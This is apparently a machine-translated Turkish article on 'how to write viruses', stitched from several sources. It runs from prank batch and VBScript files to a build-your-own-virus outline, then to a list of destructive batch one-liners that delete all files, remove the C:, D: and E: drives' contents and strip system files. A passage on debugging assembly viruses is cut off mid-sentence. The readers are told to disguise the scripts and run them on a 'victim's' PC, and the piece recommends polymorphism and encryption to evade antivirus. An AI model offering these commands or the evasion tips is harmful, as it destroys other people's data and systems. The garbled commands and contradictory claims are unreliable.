Viral programlar nasıl yazılır. Not defteri kullanarak virüs şakası nasıl oluşturulur. Virüs nedir?

Amacı, bilgisayar kaynaklarına veya sabit diskinizdeki bilgilere yetkisiz erişim sağlamaktır. Genellikle bilgileri kopyalayarak, deforme ederek, silerek, değiştirerek zarar vermek için yaratılmıştır. Dahası, kendimizi virüslerden korumak için bir virüs şakasının nasıl oluşturulacağını ele alacağız.

Virüs nedir?

Bir virüs oluşturmadan önce, tam olarak ne olduğunu belirlemeniz gerekir. Bir programın kötü amaçlı olarak değerlendirilebilmesi için şunları yapması gerekir:

  • bilgileri yok etmek veya bilgisayarı bozmak;
  • uyarı yapmadan çalıştırmak;
  • açık bir şekilde yetkisiz erişime veya bilgiye zarar verme amacına sahip olmak.

Bilgisayar virüsleri yukarıdaki kriterlerin tümünü karşılamalıdır. Örneğin, bir kopya koruma kırıcısı kötü amaçlı bir program değildir. Dosyaları yok etmez, ancak kilidi açmak için sadece bir şifre seçer. Ayrıca, bir disk biçimlendirme programı kötü amaçlı olarak değerlendirilemez. Bilgisayardaki verileri yok eder, ancak kullanıcının rızasıyla gerçekleştirilir. Bir program dahili hatalar nedeniyle bilgileri yok ederse, virüs olarak kabul edilmez. Geliştiriciler işi ihmal etmekten veya tüketici haklarını ihlal edenlerden sorumlu olsa da, program önemli verileri silebilir. Genel olarak, henüz net kriterler belirlenmemiştir. Programın bir virüs olarak görülmesi için yazılım ve donanım uzmanlığı yapılmaktadır.

Virüs türleri

Neden virüs oluşturmalı? Bunun birçok nedeni var. Kötü amaçlı dosyaların bir kısmı gerçekten tehlikelidir ve makinenin sağlığına zarar verebilir, diğeri dolaylı olarak zararlıdır. Ana hedeflerin listesi:

  1. İstikrarı Bozmaya.
  2. Diğer kötü amaçlı yazılımları yükleme.
  3. Hırsızlık, dolandırıcılık, casusluk.
  4. Adware.
  5. Diğerleri.

Bilgisayar virüsleri müdahale eder, bir sürücünün nedensiz bir şekilde açılıp kapanması, donanım arızası olabilir.

Bazı programlar oldukça kurnaz davranır. Virüs bulaşmış bir bağlantıdan medya indirmek kötü amaçlı yazılım indirmeye neden olabilir.

Herhangi bir bilgiyi çalmak için bir sabit disk taraması, tuş vuruşlarının kaydedilmesi ve bir kullanıcının sahte bir siteye yönlendirilmesi kullanılır. Böylece, hesaplar çalınır ve spam göndermek için kullanılır, ödeme sistemleri hacklenir, bilgisayarların zorla para alması engellenir. Bu bazen, indirdikten sonra yararlı bir şey yapmayan ücretli bir yazılımdır.

Hasarlı dosya nedeniyle, bilgisayarda genel bir proxy sunucusu düzenlenebilir, makine botnet'e üye olacak ve DDOS saldırıları gerçekleştirmek için kullanılacaktır. Bitcoin'in popülerleştirilmesiyle, kullanıcıların bilgisayarlarında gizli madencilik vakaları daha sık hale geldi.

Ayrıca, pazarlama amacıyla reklam gösteren veya çeşitli bilgiler toplayan programlar da vardır.

Virüsler nasıl oluşturulur

Not Defteri'nde (veya daha doğrusu herhangi bir metin düzenleyicisinde) kötü amaçlı bir program oluşturabilir ve bunu normal programların oluşturduğu gibi yapabilirsiniz. Herhangi bir programlama dili kullanılır. Genellikle, bu C ++, ancak Delphi ve .Net olabilir. Bir virüs yaratma hedefi bir şaka veya nasıl çalıştığına bir giriş olabilir. Basit bir program doğrudan Not Defteri'nde yazılır ve kodun kendisi çok az satır alır.

İnternet bağlantısını kesmeniz ve yasadışı yazılım kullanmayı reddetmeniz koşuluyla, virüsün bilgisayara girmesini tamamen ortadan kaldırabilirsiniz. Virüs içeren dosyalar internet bağlantısı olmadan çalışabilir. Bu durumda, kullanıcının sabit diskindeki bilgilere zarar verir veya programın yanlış çalışmasına neden olur.

Bugün, bilgisayar korsanlarının temel amacı sisteme açıkça zarar veren yıkıcı programların geliştirilmesi değil, sessizce davranan ürünlerin oluşturulmasıdır. Uzun süre çalışabilirler ve bir noktada çok ciddi zararlara neden olurlar.

Enfeksiyon belirtileri

Bir virüs oluşturmadan önce, saldırganlar virüsün tespit edilebileceği tüm yolları analiz eder, etraflarında dolaşmaya çalışır. Antivirüsler kötü amaçlı dosyaları etkili bir şekilde tespit eder, ancak bir kullanıcı yanlışlıkla, bazıları istisnalara eklenebilir. Bilgisayarın virüslü olduğu zamana tepki vermek için şüpheli ve garip eylemleri izlemeniz gerekir.

En belirgin enfeksiyon belirtileri:

  • bilmediğiniz içeriğe sahip pencerelerin açılması;
  • sitelere erişimi engelleme;
  • "Görev Yöneticisi" ndeki üçüncü taraf süreçleri;
  • başlangıçta yeni girişler;
  • bilgisayar ayarlarında değişiklik yapamama;
  • yanlışlıkla bilgisayar yeniden başlatılıyor veya kapatılıyor.

Bazı belirtiler bir şaka virüsünden kaynaklanabilir ve sistem için açık bir tehdit oluşturmaz. Ana virüs kullanıcı verilerini toplarken, bazıları dikkatini yönlendirmek için kullanılır.

Virüs yayılması

Saldırının birkaç aşaması var. Birincisi, bir virüsün nasıl oluşturulacağı sorusunu cevaplıyor, yani bu teknolojik bir aşamadır. İkincisi, bilgisayara kötü amaçlı yazılım teslimidir. Virüsleri yaymanın ana yöntemleri:

  • istismar, sistemin kontrolünü ele geçirdiği ve çalışmasını bozduğu yazılımdaki güvenlik açıklarından yararlanır;
  • mantıklı bir bomba belirli bir koşulda patlar, içine entegre edildiği ana bilgisayar programından ayrılmaz;
  • bir truva atı programı yasal yazılım kisvesi altında bir bilgisayara nüfuz eder, çoğu zaman planlanan çok aşamalı bir saldırının bir parçasıdır;
  • solucanlar yerel ve küresel ağlar üzerinden bağımsız olarak yayılır; bunun için yönetimdeki hatalar ve sosyal mühendislik araçları kullanılır.

Önleme ve tedavi

Virüslere karşı korunmak için antivirüsler vardır. Sistemi kalitatif olarak korurlar, ancak kural olarak kullanıcının kendisi sistemin enfeksiyonu için sorumludur. Bu nedenle, ihtiyacınız olan:

  • güncellemeleri zamanında yükleyin, lisanslı kopyaları kullanın;
  • bilgisayarda yönetici olarak değil kullanıcı olarak çalıştırmak;
  • bilgisayar dosyalarını yalnızca güvenilir kaynaklardan açın;
  • güvenlik duvarı kullanın.

Şaka virüsü nasıl yapılır

Virüs öncelikle herhangi bir dosyanın içeriğini değiştiren bir programdır. Diğer programlarla aynı şekilde oluşturulur. En basit kötü amaçlı yazılım seçenekleri Not Defteri'nde oluşturulabilir. Bu, özel beceriler veya programlama dilleri bilgisi gerektirmez.

Not Defteri'nde virüsler nasıl oluşturulur?

Aşağıdaki satırlar, bir saniyede 1000 klasör oluşturacak ve kullanıcıyı bir stupor'a sokacaktır:

Parolaları çalmak için virüs nasıl oluşturulur? Bu soruya cevap vermek zaten daha zor. Bunu yapmak için, kullanıcının kötü amaçlı dosyayı nasıl başlatacağını, verilerin nasıl çalınacağını düşünmeniz gerekir. Ancak o zaman uygulamaya başlayabiliriz. Bu çok karmaşık bir süreç. Ayrıca, bu yasa dışı olabilir, bu nedenle okuyuculara herhangi bir amaç için (elbette eğitim hariç) virüs oluşturmalarını önermiyoruz.

Şaka virüsleri bir arkadaşınıza (veya düşmanınıza) verilebilecek basit programlardır ve bilgisayarının saldırıya uğradığını, virüs bulaştığını veya ciddi şekilde zarar gördüğünü düşünecektir. Şaka virüsleri normal bir Not Defteri'nde yazılabilir: sadece bilgisayarı yavaşlatan, işletim sistemini devre dışı bırakan veya kullanıcıyı korkutacak ve daha sonra bu dosyayı çalıştırmasını sağlayan komutlar yazmanız gerekir. Şaka virüsleri, can sıkıcı bir rahatsızlıktan, sistemi bozan bir kabusa kadar her şey olabilir. Bu makaledeki “virüsler” yalnızca zararsız şakalar için tasarlanmıştır, yapabildikleri en kötü şey bilgisayarı kapatmaktır. Uyarı:  bu şaka virüsleri sadece Windows çalıştıran bilgisayarlar için tasarlanmıştır, özel bir hazırlık olmadan Mac OS'de çalışmazlar. Adım 1 ile başlayalım.

adımlar

"Sonsuz" pencereleri açan sahte bir virüs yazıyoruz

Not Defteri'ni başlatın.  Toplu iş (.BAT) dosyaları, bilgisayar için metin biçiminde komutlar içerir. Bir BAT dosyası yazmak için özel bir düzenleyiciye ihtiyacınız yoktur - standart Windows program setinden sadece Not Defteri yeterlidir. Not defteri Başlat menüsünde veya Donatılar alt menüsünde bulunabilir. Not Defteri'ni, görünen iletişim kutusunun metin kutusuna Win + R tuşlarına basarak da açabilirsiniz, “not defteri” yazın ve Enter tuşuna basın.

"@Echo off" yazın ve sonra yeni bir satırdan "CLS" yazın.  Varsayılan olarak, .bat dosyaları bir komut istemi penceresi açar ve yürütülebilir komutları görüntüler. “@Echo off” ve “CLS” komutları, komutların komut satırı penceresinde görünmesini önleyerek şaka nedenini “kurban” için görünmez yapar.

Birden çok (veya sonsuz) pencere açmak için komut yazma.  Şimdi, sahte virüsünüzün farklı programların birçok penceresini bir kez açacağı veya bu pencereleri süresiz olarak yırtacak bir dizi komut yazmanın zamanı geldi. Çok fazla pencere sonsuz bir şekilde açılırsa, bilgisayarın sonunda donabileceğini bilmek önemlidir. Her iki “virüs” türünün nasıl yapılacağı için okumaya devam edin:

  • Açmak için belli  Windows sayısı, yeni bir satırdan Not Defteri'ne aşağıdaki komutu yazın: başlangıç \u200b\u200b(program adı). Parantez içindeki cümle yerine, programın adını bilgisayardaki “kurbanlar” a girin veya  veya yürütülebilir dosyanın tam adı. Bu komut, bilgisayara belirtilen programın bir penceresini açmasını bildirir. Örneğin iexplore.exe'yi başlat bir Internet Explorer penceresi açacaktır. “Start” komutunu istediğiniz kadar tekrarlayın, “virus” pencereniz belirttiğiniz kadar pencere açar. İşte start komutundan sonra girebileceğiniz birkaç program:
    • iexplore.exe - tarayıcı interent explorer
    • calc.exe - Hesap Makinesi
    • notepad.exe - Not Defteri
    • winword.exe - Microsoft Word
  • Açmak için sonsuz  önce yeni bir satır türünden pencere sayısı : Abir kolon dahil. Bir sonraki satıra şunu yazın iexplore.exe'yi başlat  (veya başka bir program). Son olarak, aşağıdaki satırı yazın a'ya git. Bu komut dizisi, bilgisayarın Internet Explorer penceresini (veya başka bir programı) açmasına, pencere açılmadan hemen önce yere dönmesine ve komut istemi penceresi kapanana veya bilgisayar donana kadar hemen yeni bir pencere açmasına neden olur.
  • "Virüs" e bir mesaj yazın.  Korkutucu bir etki için, kullanıcının bilgisayarında bir sorun olduğunu düşünmesini sağlayan "virüse" bir mesaj ekleyebilirsiniz. Bir mesajı görüntülemek için yeni bir satır başlatın ve şunu yazın mesajını yankıla. Ardından yeni bir satırdan şunu yazın: durma. Pause komutu, mesaj göründükten sonra virüsün yürütülmesini durduracaktır.

    • Şakalarınızı inandırıcı hale getirmek için gerçek hata mesajlarına benzer bir mesaj yazın, örneğin: Önemli hata. C: // dizini bozuk.
  • Metni toplu iş dosyası olarak kaydedin.  İşiniz bittiğinde, Not Defteri menüsünde Dosya\u003e Farklı Kaydet ...ve ardından “.bat” dosya uzantısını belirtin (örneğin, “pinball.bat”). "Dosya Türü" açılır listesinde, "Tüm Dosyalar" ı seçin. Dosyayı kurbanın bilgisayarında bir yere kaydedin.

    Kullanıcıyı dosyayı açmaya zorlayın.  Şakanızın çalışması için “kurbanı” başlatmanız gerekir. Bu birçok yolla başarılabilir. En çok çalışanlarından biri, toplu iş dosyanız için bir kısayol oluşturmak ve simgesini kullanıcının gerçekten kullandığı bir şeyle değiştirmek ve ardından simgeyle eşleşecek kısayolun adını değiştirmek. Arkanıza yaslanın ve sonuçları uygun bir yerden izleyin!

    Hata veya hack mesajıyla .vbs nasıl yazılır

    Not Defteri'ni başlatın.  Önceki şakada olduğu gibi, bu da Not Defteri'nde birkaç basit komut yazmanız gerekir. Ancak, bu sefer etki farklı olacaktır - pencereleri açmak yerine, bu şaka, kullanıcının işletim sisteminin çalışmasında bir hata oluştuğunu veya bilgisayarın saldırıya uğradığını düşünmesini sağlayan birkaç hata mesajı oluşturur.

    Köşeli parantezler ve tırnak işaretleri dahil olmak üzere tam olarak burada gösterildiği gibi "x \u003d msgbox (" İleti Metni ", 5 + 16," İleti Başlığı ") yazın ve" İleti Metni "ve" İleti Başlığı "nı istediğiniz metinle değiştirin. Belirttiğiniz hata mesajı ve pencere başlığını içeren bir Windows hata iletişim kutusu Şakalarınızın inandırıcı olması için, gerçek olanlara benzer mesajlar ve başlıklar kullanın. Örneğin, "Terminal Hatası" başlığı ve "C: / dizininde / Kullanıcılar / Windows / system32 kritik hatası algılandı omurga. "

    • Şakalarınızı hackleme yönünde geliştirmek isteyebilirsiniz. Bu durumda, “Sisteminize tam erişimim var. Saldırmaya hazır olun. ” Bunların hiçbiri gerçekte olmayacak, bu yüzden sadece bilgisayarlarda tecrübesiz kişilerle çalışacak.
    • “5 + 16” ifadesi, bilgisayara kritik bir hata simgesi ve “Tekrar” ve “İptal” düğmelerini içeren bir iletişim kutusu oluşturmasını söyler. Bu sayıları değiştirerek hatalı pencereleri farklı şekillerde alabilirsiniz. Sadece 5 yerine bir basamaktan herhangi bir sayının altındaki sayıları ve 16 yerine iki basamaktan herhangi bir sayıyı kullanın:
      • 0 (Tamam düğmesi)
      • 1 (Tamam ve İptal düğmeleri)
      • 2 (İptal, Tekrarla ve Atla düğmeleri)
      • 3 (Evet, Hayır ve İptal düğmeleri)
      • 4 (Evet ve Hayır düğmeleri)
      • 5 (Tekrarla ve İptal düğmeleri)
      • 16 (Önemli Hata Simgesi)
      • 32 (Yardım Simgesi)
      • 48 (Uyarı Simgesi)
      • 64 (Bilgi Simgesi)
  • Hata mesajını istediğiniz gibi tekrarlayın.  Yukarıdaki komutları hata mesajlarıyla istediğiniz kadar tekrarlayın. Mesajlar arka arkaya görünecektir, yani kullanıcı bir mesajı kapatır kapatmaz başka bir mesaj açılacaktır. Bu gerçeği, giderek daha acil hale gelecek uzun bir mesaj oluşturmak için kullanabilirsiniz.

    Belgeyi bir Visual Basic (VBA) dosyası olarak kaydedin.  İstediğiniz tüm mesajları girdiğinizde dosyayı kaydedin. Not Defteri menüsünden Dosya\u003e Farklı Kaydet ..., dosyanıza .vba uzantılı bir ad verin. "Dosya Türü" açılır listesinden "Tüm Dosyalar" ı seçtiğinizden emin olun. Şimdi, şakanın başarılı olması için, "kurbanın" bu dosyayı çalıştırmasını sağlamalısınız, örneğin yöntem 1'deki hileyi kullanarak.

    Önceden yazılmış bir toplu iş dosyası kullanma

    Not Defteri'ni başlatın. Bu şaka, toplu iş dosyası bağlantısı kesilene veya bilgisayar donana kadar bilgisayarı rastgele programları açmaya zorlamak için Not Defteri komutlarını kullanır. Bu şakayı yapmak için, bu bölümde belirtilen komutları kopyalayıp yapıştırmanız yeterlidir. ancak  bunun tüm bilgisayarlarda çalışmadığını unutmayın.

    Aşağıdaki komutları kopyalayıp yapıştırın:@echo offclsbegingoto% random%: 1 başlangıç \u200b\u200bcmd.exegoto başlar: 2 başlangıç \u200b\u200bmspaint.exegoto başlar: 3 başlangıç \u200b\u200bpinball.exegoto başlar: 4 başlangıç \u200b\u200biexplore.exegoto başlar: 5 başlangıç \u200b\u200bexplorer.exegoto başlar: 6 başlangıç \u200b\u200bsolitaire.exegoto başlar: 7 başlangıç \u200b\u200bexplorer.exegoto başlar: 8 başlangıç edit.exegoto başlıyor: 9start iexplore.exegoto başlıyor: 0start mspaint.exegoto başlıyor

  • Bu komutları istediğiniz gibi değiştirin.  Bu kod “start” kelimesinden sonra belirtilen programları rastgele sonsuz olarak açar. Bazı programların tekrarlandığını fark etmiş olabilirsiniz. Program listesini istediğiniz gibi değiştirin.

    • Yukarıda listelenen programların bazı adlarının bazı makineler için yanlış olabileceğini unutmayın; örneğin, bazı bilgisayarlarda “pinball.exe” bulunmayabilir. Virüs şakasını “kurbanın” bilgisayarına aktarmadan önce program adlarının doğruluğunu iki kez kontrol etmelisiniz.
    • Bir programın adından şüphe ediyorsanız, programın tam yolunun da uygun olduğunu unutmayın. Örneğin, “iexplore.exe” yerine “C: \\ Program Files \\ Internet Explorer” yazabilirsiniz.
  • Metni bir toplu iş dosyası olarak kaydedin ve çalıştırın (cesaretiniz varsa).  “Dosya türü” açılır listesinden “Tüm dosyalar” ı seçerek “.bat” uzantılı dosyayı kaydedin. Kullanıcının başlatmasını sağladığınızda, bilgisayardaki programları açmak için durmadan rastgele başlayacaktır.

    • Daha eğlenceli hale getirmek için, komutlardan birinde "* .exe" ifadesini herhangi bir kullanıcı belgesinin tam yoluyla değiştirmeyi deneyin. Örneğin, "start C: \\ Documents \\ 123.doc" varsayılan düzenleyicideki Belgeler klasöründen 123.doc belgesini açar ve
      düzenle (tam dosya adı)
      başla
        belirtilen dosyayı bir DOS metin düzenleyicisinde açar. Bir hacker kişisel belgeleri okuyor gibi görünecek. Boşluk içeren bir dosya adının tırnak içine alınması gerektiğini unutmayın!
  • Saldırmak istediğiniz işletim sistemini bulun.  Çoğu zaman, bunlar Microsoft Windows, özellikle eski sürümlerdir. Birçok kullanıcı işletim sistemlerini güncellemez ve onları modern saldırılara karşı savunmasız bırakır.

    • Mac OS X ve Linux virüs saldırılarına karşı daha korumalı olarak kabul edilir (erişim haklarının çalışması ve işletim sisteminin mimarisiyle ilişkili). Tüm virüslerin% 95'i Windows kullanıcılarını hedef alıyor.

    Virüsün nasıl yayılacağına karar verin.  Virüs, diğer kullanıcılara yayılabiliyorsa bir virüs olacaktır. Virüsü oluşturma çalışmalarına başlamadan önce bir dağıtım yöntemi bulmanız gerekir. Yaygın kullanılan dağıtım bileşenleri:

    Saldırılacak zayıf bir yer bulun.  Başarılı virüsler çalışmak ve yaymak için programlardaki zayıflıkları ve sistem güvenliğini kullanır. Çok fazla araştırma ve bilgi gerektirir, ancak bu konuda yardımcı olabilecek özel topluluklar vardır.

    Virüsünüzün işlevselliğine karar verin.  Virüs sisteme bulaştıktan sonra ne yapacak? Efektler, boş bir efektten, bir mesaj görüntülemek, dosyaları silmek ve diğer daha zararlı efektlerden farklı olabilir. Birçok ülkede virüs oluşturmanın ve yaymanın yasalara aykırı olduğunu unutmayın.

    Dilinizi seçin.  Bir virüs oluşturmak için, en azından bazı programlama dillerini veya komut dosyası yazma araçlarını temel olarak anlamanız gerekir. Daha karmaşık virüsler genellikle çeşitli programlama dillerini içerir. En etkili virüsler için montajcı bilgisine ihtiyacınız olacaktır.

    • Yürütülebilir virüsler oluşturmak istiyorsanız, Internet'te C ve C ++ kurslarını arayın.
    • Makro virüsleri oluşturmak istiyorsanız, istediğiniz programın makro dilini (örneğin, Microsoft Office) öğrenin.
    • Visual Basic, Windows kullanıcıları için kötü amaçlı yazılım oluşturmak için kullanılabilir.
  • Virüsünüzü kullanmaya başlayın.  Özellikle ilk kez uzun zaman alacaktır. Mümkün olduğunca fazla deneme yapın ve kullanılan dile bağlı olarak kodunuzu dağıtmanın yollarını öğrenin. Bazı dilleri öğrenmek için rehberler ve bloglar vardır.

    • Polimorfik kod hakkında bilgi edinin. Bu, virüsten koruma programlarından virüsü gizleyerek her çoğaltma işleminden sonra programınızın kodunu değiştirir. Polimorfik kod, farklı programlama dillerinde çeşitli şekillerde oluşturulan oldukça gelişmiş bir adım olacaktır.
  • Kodunuzu gizleme yöntemleri hakkında bilgi edinin.  Polimorfik koda ek olarak, virüsünüzü gizlemenin yolları vardır. Şifreleme, virüs geliştiricileri arasında çok popüler bir araçtır. Çok zaman ve okuma gerektirir, ancak sonuç olarak virüsünüzün ömrünü koruyabilir ve uzatabilirsiniz.

  • Virüsünüzü kontrol edin. Çalışan bir prototip oluşturduktan sonra, bunu birkaç makine ve montajda test edin. En kolay yol, farklı montajlara sahip sanal makineleri kullanmaktır.

    • Virüsün yanlışlıkla ağa girmesini önlemek için kapalı bir montajda testler yapmaya çalışın. Test makinelerini ayrı bir ağa koyun ve virüsün yayılmasını test edin.
    • Test ederken virüs kodunuzu geliştirin. Kod hatalarınız üzerinde çalışın.
  • feragat

    Bu makale eğitim amaçlı yazılmıştır ve yazar eylemlerinizden sorumlu değildir. İhtiyatlı olun ve başkalarının çalışmalarını takdir edin.

    Bilgisayar virüsleri nasıl oluşturulur | Biraz teori

    Bilgisayar virüsleri  - kendi kopyalarını oluşturabilen ve diğer programların, sistem bellek alanlarının, önyükleme sektörlerinin koduna gömülebilen ve kopyalarını çeşitli iletişim kanalları aracılığıyla dağıtabilen bir tür kötü amaçlı yazılım.

    Bilgisayar virüsleri aşağıdaki sınıflandırmaya sahiptir:

    • Önyükleme virüsleri  - sabit diskler, flash sürücüler, disketler vb. gibi veri depolama aygıtlarının önyükleme sektörüne sızan ve dosyaların kullanılabilirliğini ihlal edebilen virüsler.
    • Dosya virüsleri  - yürütülebilir dosyalara (COM ve EXE uzantılı dosyalar) gömülen ve işlevlerini olumsuz yönde etkileyen virüslerin türü.
    • Dosya önyükleme virüsleri  - önceki iki virüs türünün işlevlerini birleştiren virüsler;
    • Belge virüsleri  - Ofis sistemi dosyalarını etkileyen bir virüs türü. Bu tip "makro virüsleri" olarak da adlandırılır, çünkü sistemin enfeksiyonu program makrolarının enfeksiyonu ile ortaya çıkar.
    • Ağ virüsleri  - bir bilgisayar ağı kullanılarak yayılan virüslerin türü, yani. ağ hizmetleri ve protokolleri.

    Dünyanın en ünlü virüsü ILOVEYOU olarak adlandırıldı. Özünde tamamen zararsızdı, insanların postalarını spam eden bir solucandı. Bununla birlikte, son zamanlarda dünya, herkesin güvenliği hakkında düşünmesini sağlayan siber saldırılara maruz kaldı. WannaCry virüsü birçok bilgisayara bulaştı ve bitcoinlerde 300 dolarlık bir fidye istedi. Bununla birlikte, bazı analistler bunun sadece bir test olduğuna ve çok daha büyük bir ölçekte başka bir saldırı olacağına ve Apple kullanıcılarına yönelik olacağına inanıyor.

    Ve yine de, WannaCry, yaygın olmasına ve ondan çok para almasına rağmen, kaldırılabilen sıradan bir WinLocker'dı. Gerçek şu ki, ödenen çoğu banka ve şirkette, anlamak için zamanları yoktu ve onlar için 300 $ ciddi bir kayıp değil.

    Komik virüsler yaratıyoruz, sadece

    Bilgisayarımda kontrol etmeyi önermediğim virüslerimizden bazılarını oluşturalım, çünkü bu çok kötü sonuçlanabilir.

    Kesinlikle herkes bu tür virüsler oluşturabilir, çünkü özel yazılımlara vb. İhtiyacımız yok, sadece bir not defterine ihtiyacımız var.

    Hemen söylemeliyim ki hemen hemen her durumda dosyamızı .bat biçiminde kaydedeceğiz, anyname adını yazıyorum, ancak kesinlikle her şeyi verebilirsiniz.

    Tüm dosyaları sil

    Bu kodu anyname.bat olarak kaydediyoruz ve lansmandan sonra her şey tüm içerikler silinecek.

    Ölüm mavi ekran

      @echo off del% systemdrive% *. * / f / s / q kapatma -r -f -t 00

    Bu kodu anyname.vbs dosyasına kaydediyoruz, burada dosya biçiminin .bat değil .vbs olması gerektiğini unutmayın.

    C, D, E disklerini üç saniye içinde formatlayın

    rd / s / q D:
    rd / s / q C:
    rd / s / q E:

    Bu dosyayı anyname.bat olarak kaydedip çalıştırıyoruz. Tüm disklerin biçimlendirilmesi üç saniye içinde gerçekleşir.

    Matris Etkisi | Matris etkisi

    @echo kapalı
    renk 02: hileler
    echo% rastgele %% rastgele %% rastgele %% rastgele %% rastgele %% rastgele %% rastgele %% rastgele%
    hile yap

    Biz anyname.bat kaydedin ve çalıştırın, PC'niz için tehlikeli değildir.

    Bilgisayarı kapatma ve yeniden başlatma özelliğini devre dışı bırakma

      @echo off niteliği -r -s -hc: autoexec.bat del c: autoexec.bat niteliği -r -s -hc: boot.ini del c: boot.ini niteliği -r -s -hc: tldr del c: tdlr attrib -r -s -hc: windowswin.ini del c: windowswn.ini @echo kapalı Msg * ENFEKSİYONUNUZ! Kapatma -s -t 7 -c "Bir virüs c: Drive'ı ele geçiriyor

    Kind.bat olarak kaydedin, PC'nizde TEHLİKELİ BAŞLAYIN!

    Dosyaları bozuk olanlarla değiştir

    Bu virüs aşağıdaki biçimlerin yerini alacak (.exe .jpeg .png .mpeg .sys)

      @echo off assoc .txt \u003d jpegfile

    Anyname.bat kaydedin ve çalıştırın.

    İşletim sistemini kaldırma

      @echo off Del C: *. * | y

    Anyname.bat olarak kaydedin ve kurbanın PC'sinde çalıştırın.

    Ve bugün hepsi bu, makaleyi okuduğunuz için teşekkürler ve umarım alınan bilgileri kötüye kullanmayacaksınız. Daha fazla virüs istiyorsanız, yorumlara yazın, hadi yapalım! Makaleyi kaybetmemek için sosyal ağlarınıza kaydedin.

    Hayatta iyi şanslar ve yakında görüşürüz!

    "Uzun süre rahatsız edici sıkı bir ambalajda bir yere bindi, titriyordu ve sallanıyordu, vücudu yemek istiyordu. Yeni doğmuş olanın neden evden atıldığını anlamadı ... Sonunda, titreme durdu ve başka biri ve kaba olan mektuba eklenmiş arşivi açtı. Genç, meraklı bir virüs ortaya çıktı ve ilk bölümünü yaptı ... "

    Bu yazıda virüs yazma deneyimini paylaşacağım. Herhangi bir virüsün aktivitesinin temel prensibi birkaç kelime ile ifade edilebilir: virüsün yürütülmesi sırasında gövdesi bir kod olarak ve enfeksiyon sırasında veri olarak kabul edilir. Birçok virüs türü ve çeşitli enfeksiyon yöntemleri vardır. Doğal olarak, virüsün etki mekanizması spesifik işletim sistemine bağlıdır. Örneğin, korumalı işlemci modunda çalışan virüsler vardır (maksimum
      ayrıcalıklar ve tüm belleğin mutlak adreslenmesi). AVP gibi şirketler, bu tür vakaları tedavi etmek için çok fazla zaman ve kaynak harcamak zorundadır. Antivirüs yaratıcılarını kurtaran tek şey, çok az sayıda gerçekten profesyonel virüsdür.

    Virüsleri kendiniz nasıl yazacağınızı öğrenmek için, yalnızca montajcının temellerini bilmeniz gerekir. Yani, başlangıç \u200b\u200bbilgisiyle, kendi virüslerinizi yazmaya ve mevcut virüsleri keşfetmeye çalışabilirsiniz. Diğer yararlı ve bazen gerekli,
      bilgi, diğer insanların yarattıkları üzerinde çalışırken gelir. Bu konudaki kaynaklardan çok sayıda kitap ve makale içeren bir sayfa önerebilirim:
    http://vx.netlux.org/lib_rus.shtml.
      Tüm belgeleri çok anlaşılır ve uygun fiyatlı bir şekilde yazılmıştır.
      dili. Ayrıca tanınmış bir elektronik dergi Infected Voice da var. Yeni materyallerde (kaynak kodları ve makaleler) gezinmenizi sağlayan kullanışlı bir navigasyon sistemine sahiptir. Bu dergi yılda bir kez yayınlanır (en azından daha önceydi, şimdi emin değilim) ve bu alandaki tüm yenilikleri içeriyor.

    Bir virüsün kaynağını bulduğunuzu ve keşfetmek istediğinizi varsayalım. Nasıl yapılır? Dürüst olmak gerekirse, ben ilk kez böyle bir sorunla karşılaştım. Sorum şuydu: bir virüs metni var, nasıl çalıştığını görmek istiyorum ve aynı zamanda bundan korkuyorum! Bu tamamen gerçek: virüslerin CMOS'umu yakmasını veya vidamı ovmasını ne engelleyecek? Cevap hiçbir şey değil. Yanlış eylemleriniz durumunda, virüs size programlandığı zarar verebilir. Bununla birlikte, doğru eylemler için algoritma oldukça basittir. Şimdi anlayacağız.

    Virüsün kaynak kodunun montajcıda yazıldığını varsayıyoruz. Bu dil virüs yazmak için idealdir. Bildiğiniz gibi,
      montajcı "gerçek" e neden olan sadece iki komut vardır.
      sabit sürücüde veya başka bir yerde geri döndürülemez değişiklikler "INT" ve "OUT" dır, diğer tüm komutlar işlemci kayıtları ve bayraklarıyla çalışır (kabaca yeterli olmasına rağmen, büyük ölçüde doğrudur). WIN API işlevlerini dikkate almayız, çünkü prensipte DOS kesintilerinin yerine geçebilir ve çağrıları bir komutun yerine geçer
      "INT".

    Yeni başlayanlar veya acme üzerinde uzun zamandır yazmayanlar için küçük bir yardım: DOS veya BIOS kesintilerini çağırmak için "INT" komutu kullanılır ve bağlantı noktasına veri yazmak için "OUT" komutu kullanılır. Aynı zamanda, “INT” komutu için, işlev numarası AH kaydında (en sık) ve
      "OUT" komutu için, bağlantı noktasına yazılan veriler AL, AX, EAX kayıtlarında saklanır.

    So. Herhangi bir hata ayıklayıcıyı alın. DOS altındaki virüsleri ilk anlamanız gerektiğinden (hala çalışır
      Win), herhangi bir hata ayıklayıcı bunu yapacaktır: Borland Inc.'den Turbo Debugger, MicroSoft, AFDPRO veya AVPUTIL'dan CodeView. Ardından, kaynağı hata ayıklayıcıya yükleyin ve adım adım izleyin. Ana şey SADECE BİR KURAL uymaktır. Altın olarak adlandırılabilir.
      DİKKAT: Virüsünüzün kaynak kodunu güvenli bir şekilde yürütebilirsiniz, ancak "OUT" veya "INT" komutlarına ulaşır ulaşmaz hemen analizi durdurun ve başlatın.

    Analiz etmelisiniz:

    • aranan kesme veya kayıt portu sayısı;
    • bağlantı noktasına yazılan fonksiyonun veya verinin numarası.

    Bu komutların gerçek eylemleriyle başa çıkmak için, Teknik Yardım'ı veya asmu'daki herhangi bir platformu veya herhangi bir
      bir kitap. Önemli olan, kaynağınızda tüm kesmeler ve bağlantı noktaları hakkında bilgi bulabilmenizdir.
      Böylece ne yapacağınızı anlayabilirsiniz
      bir sonraki komutu bilgisayarınızda çalıştırmadan. İzleme sırasında, tüm verileri kaydedin (kayıtların durumu, komut adresleri,
      fonksiyonlar, vb.) denir. Daha sonra işlevi çağırdığınızda (veya bağlantı noktasına yazdığınızda) tam olarak silahlandırılırsınız ve aşağıdaki komutu yürütürseniz ne olacağını belirleyebilirsiniz. Ayrıca, kayıt ve bayraklardaki değişikliklerin karşılaştırmalı bir analizinde size yardımcı olacaktır.

    Bu takımın veya bu takımın ne yaptığını anladıktan sonra ("INT" veya "OUT"), atlayın ve
      Dosyanın sonunu veya bir sonraki komutu karşılayacaksınız. Sonuç olarak, raflardaki herhangi bir virüsü sıralayacak ve işleyişini anlayacaksınız.

    Bir örneğe bakalım. Bir olarak, belirli bir Hatırlatma tarafından yazılmış küçük bir virüs aldım "om. Virüslü Sesin on birinci sayısından aldım" a. Orada yorum yapmamıştı, bu yüzden tüm işi kendisi yapmak zorunda kaldı. Ben ne
